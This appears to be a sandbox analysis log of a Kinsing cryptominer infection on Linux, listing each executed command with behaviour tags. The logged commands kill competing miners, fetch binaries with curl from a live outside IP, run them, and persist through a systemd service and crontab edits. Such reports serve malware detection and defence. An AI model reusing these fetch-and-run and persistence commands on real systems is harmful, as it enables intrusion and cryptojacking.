/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1435
-
-
/usr/bin/idid -u2⤵PID:1436
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1437 -
/usr/sbin/sendmailsendmail -t3⤵PID:1440
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGL6-0000NE-Hb4⤵
- Reads CPU attributes
PID:1453
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1443
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGL6-0000NH-Ha4⤵
- Reads CPU attributes
PID:1454
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1444
-
-
-
/usr/bin/idid -u2⤵PID:1445
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1446
-
-
/bin/unameuname -m2⤵PID:1447
-
-
/bin/lsls -la /etc/data2⤵PID:1449
-
-
/bin/grepgrep -e /dev2⤵PID:1450
-
-
/bin/grepgrep -v grep2⤵PID:1451
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1452
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
PID:1455
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1457
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
PID:1458
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
PID:1459
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
PID:1460
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
PID:1463
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
PID:1464
-
-
/bin/grepgrep -v -2⤵PID:1469
-
-
/bin/grepgrep :14142⤵PID:1466
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1470
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1467
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1468
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1474
-
-
/bin/grepgrep -v grep2⤵PID:1473
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1475
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1472
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1471
-
-
/bin/grepgrep stratum2⤵PID:1477
-
-
/bin/grepgrep -v grep2⤵PID:1478
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1476
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1479
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1480
-
-
/bin/grepgrep -v grep2⤵PID:1483
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1484
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
- Reads runtime system information
PID:1485
-
-
/bin/grepgrep Sofia2⤵PID:1482
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1481
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1486
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1491
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1490
-
-
/bin/grepgrep -v grep2⤵PID:1489
-
-
/bin/grepgrep tracepath2⤵PID:1488
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1487
-
-
/bin/grepgrep -v grep2⤵PID:1494
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1495
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1496
-
-
/bin/grepgrep /dot2⤵PID:1493
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1492
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1500
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1501
-
-
/bin/grepgrep -v grep2⤵PID:1499
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1498
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1497
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1505
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1506
-
-
/bin/grepgrep -v grep2⤵PID:1504
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1503
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1502
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1510
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1511
-
-
/bin/grepgrep -v grep2⤵PID:1509
-
-
/bin/grepgrep "bash -k"2⤵PID:1508
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1507
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1515
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1516
-
-
/bin/grepgrep -v grep2⤵PID:1514
-
-
/bin/grepgrep perfctl2⤵PID:1513
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1512
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1517
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads runtime system information
PID:1518
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1522
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1523
-
-
/bin/grepgrep -v grep2⤵PID:1521
-
-
/bin/grepgrep ./ll12⤵PID:1520
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1519
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1527
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1528
-
-
/bin/grepgrep -v grep2⤵PID:1526
-
-
/bin/grepgrep agetty2⤵PID:1525
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1524
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1529
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1533
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1532
-
-
/bin/grepgrep -v -2⤵PID:1534
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1535
-
-
/bin/grepgrep 207.38.87.62⤵PID:1531
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1539
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1538
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1537
-
-
/bin/grepgrep -v -2⤵PID:1540
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1541
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1545
-
-
/bin/grepgrep -v -2⤵PID:1546
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1544
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1547
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1543
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1551
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1550
-
-
/bin/grepgrep -v -2⤵PID:1552
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1553
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1549
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1557
-
-
/bin/grepgrep -v -2⤵PID:1558
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1556
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1559
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1555
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1560
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
PID:1561
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
- Reads runtime system information
PID:1562
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
- Reads runtime system information
PID:1563
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1564
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1565
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1566
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
- Reads runtime system information
PID:1567
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1568
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1569
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1570
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1571
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1572
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
PID:1573
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
PID:1574
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1575
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
PID:1576
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1577
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
PID:1578
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1580
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵PID:1581
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1582
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1583
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1584
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1585
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
PID:1586
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1591
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1590
-
-
/bin/grepgrep -v grep2⤵PID:1589
-
-
/bin/grepgrep ./udp2⤵PID:1588
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1587
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1592
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1594
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1593
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1595
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1597
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1596
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1598
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1600
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1599
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1601
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1603
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1602
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1604
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1605
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1606
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1607
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1609
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1608
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1610
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1611
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1612
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
- Reads runtime system information
PID:1613
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1615
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1614
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1616
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1618
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1617
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1619
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1621
-
-
/bin/catcat /data/./oka.pid2⤵PID:1620
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1622
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1624
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1623
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1625
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1627
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1626
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
PID:1628
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
PID:1629
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1630
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1631
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1632
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
PID:1633
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1634
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1638
-
-
/bin/grepgrep -v grep2⤵PID:1637
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
- Reads runtime system information
PID:1639
-
-
/bin/grepgrep ./oka2⤵PID:1636
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1635
-
-
/bin/grepgrep -v grep2⤵PID:1642
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1643
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1641
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1644
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1640
-
-
/bin/grepgrep -v bin2⤵PID:1647
-
-
/bin/grepgrep -v "\\["2⤵PID:1648
-
-
/bin/grepgrep -v "("2⤵PID:1649
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1646
-
-
/bin/grepgrep -v php-fpm2⤵PID:1650
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1645
-
-
/bin/grepgrep -v proxymap2⤵PID:1651
-
-
/bin/grepgrep -v postgres2⤵PID:1652
-
-
/bin/grepgrep -v postgrey2⤵PID:1653
-
-
/bin/grepgrep -v kinsing2⤵PID:1654
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1655
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1656
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1657
-
-
/bin/grepgrep -v bin2⤵PID:1659
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1658
-
-
/bin/grepgrep -v "\\["2⤵PID:1660
-
-
/bin/grepgrep -v "("2⤵PID:1661
-
-
/bin/grepgrep -v php-fpm2⤵PID:1662
-
-
/bin/grepgrep -v proxymap2⤵PID:1663
-
-
/bin/grepgrep -v postgres2⤵PID:1664
-
-
/bin/grepgrep -v postgrey2⤵PID:1665
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1666
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1667
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1669
-
-
/bin/grepgrep -v bin2⤵PID:1670
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1668
-
-
/bin/grepgrep -v "\\["2⤵PID:1671
-
-
/bin/grepgrep -v "("2⤵PID:1672
-
-
/bin/grepgrep -v php-fpm2⤵PID:1673
-
-
/bin/grepgrep -v proxymap2⤵PID:1674
-
-
/bin/grepgrep -v postgres2⤵PID:1675
-
-
/bin/grepgrep -v postgrey2⤵PID:1676
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1677
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1678
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1681
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1682
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1683
-
-
/bin/grepgrep -v grep2⤵PID:1680
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1679
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1687
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1686
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1688
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1689
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1690
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1691
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1695
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1694
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1698
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1699
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1700
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1701
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1702
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1706
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1705
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1707
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1708
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1709
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1712
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1713
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1714
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1715
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1716
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1717
-
-
/usr/bin/idid -u2⤵PID:1719
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1720
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1733
-
-
/bin/sedsed /base64/d2⤵PID:1738
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1739
-
-
/usr/bin/crontabcrontab -l2⤵PID:1737
-
-
/bin/sedsed /_cron/d2⤵PID:1741
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1742
-
-
/usr/bin/crontabcrontab -l2⤵PID:1740
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1745
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1744
-
-
/usr/bin/crontabcrontab -l2⤵PID:1743
-
-
/bin/sedsed /update.sh/d2⤵PID:1747
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1748
-
-
/usr/bin/crontabcrontab -l2⤵PID:1746
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1751
-
-
/bin/sedsed /logo4/d2⤵PID:1750
-
-
/usr/bin/crontabcrontab -l2⤵PID:1749
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1754
-
-
/bin/sedsed /logo9/d2⤵PID:1753
-
-
/usr/bin/crontabcrontab -l2⤵PID:1752
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1757
-
-
/bin/sedsed /logo0/d2⤵PID:1756
-
-
/usr/bin/crontabcrontab -l2⤵PID:1755
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1760
-
-
/bin/sedsed /logo/d2⤵PID:1759
-
-
/usr/bin/crontabcrontab -l2⤵PID:1758
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1763
-
-
/bin/sedsed /tor2web/d2⤵PID:1762
-
-
/usr/bin/crontabcrontab -l2⤵PID:1761
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1766
-
-
/bin/sedsed /jpg/d2⤵PID:1765
-
-
/usr/bin/crontabcrontab -l2⤵PID:1764
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1769
-
-
/bin/sedsed /png/d2⤵PID:1768
-
-
/usr/bin/crontabcrontab -l2⤵PID:1767
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1772
-
-
/bin/sedsed /tmp/d2⤵PID:1771
-
-
/usr/bin/crontabcrontab -l2⤵PID:1770
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1775
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1774
-
-
/usr/bin/crontabcrontab -l2⤵PID:1773
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1778
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1777
-
-
/usr/bin/crontabcrontab -l2⤵PID:1776
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1781
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1780
-
-
/usr/bin/crontabcrontab -l2⤵PID:1779
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1784
-
-
/bin/sedsed /pastebin/d2⤵PID:1783
-
-
/usr/bin/crontabcrontab -l2⤵PID:1782
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1787
-
-
/bin/sedsed /onion/d2⤵PID:1786
-
-
/usr/bin/crontabcrontab -l2⤵PID:1785
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1790
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1789
-
-
/usr/bin/crontabcrontab -l2⤵PID:1788
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1793
-
-
/bin/sedsed /shuf/d2⤵PID:1792
-
-
/usr/bin/crontabcrontab -l2⤵PID:1791
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1796
-
-
/bin/sedsed /ash/d2⤵PID:1795
-
-
/usr/bin/crontabcrontab -l2⤵PID:1794
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1799
-
-
/bin/sedsed /mr.sh/d2⤵PID:1798
-
-
/usr/bin/crontabcrontab -l2⤵PID:1797
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1805
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1804
-
-
/usr/bin/crontabcrontab -l2⤵PID:1803
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1808
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1807
-
-
/usr/bin/crontabcrontab -l2⤵PID:1806
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1811
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1810
-
-
/usr/bin/crontabcrontab -l2⤵PID:1809
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1813
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1814
-
-
/usr/bin/crontabcrontab -l2⤵PID:1812
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1817
-
-
/bin/sedsed /github/d2⤵PID:1816
-
-
/usr/bin/crontabcrontab -l2⤵PID:1815
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1820
-
-
/usr/bin/crontabcrontab -l2⤵PID:1818
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1819
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1823
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1822
-
-
/usr/bin/crontabcrontab -l2⤵PID:1821
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1825
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1826
-
-
/usr/bin/crontabcrontab -l2⤵PID:1824
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1829
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1828
-
-
/usr/bin/crontabcrontab -l2⤵PID:1827
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1832
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1831
-
-
/usr/bin/crontabcrontab -l2⤵PID:1830
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1834
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1835
-
-
/usr/bin/crontabcrontab -l2⤵PID:1833
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1837
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1838
-
-
/usr/bin/crontabcrontab -l2⤵PID:1836
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1841
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1840
-
-
/usr/bin/crontabcrontab -l2⤵PID:1839
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1844
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1843
-
-
/usr/bin/crontabcrontab -l2⤵PID:1842
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1847
-
-
/bin/sedsed /update.sh/d2⤵PID:1846
-
-
/usr/bin/crontabcrontab -l2⤵PID:1845
-
-
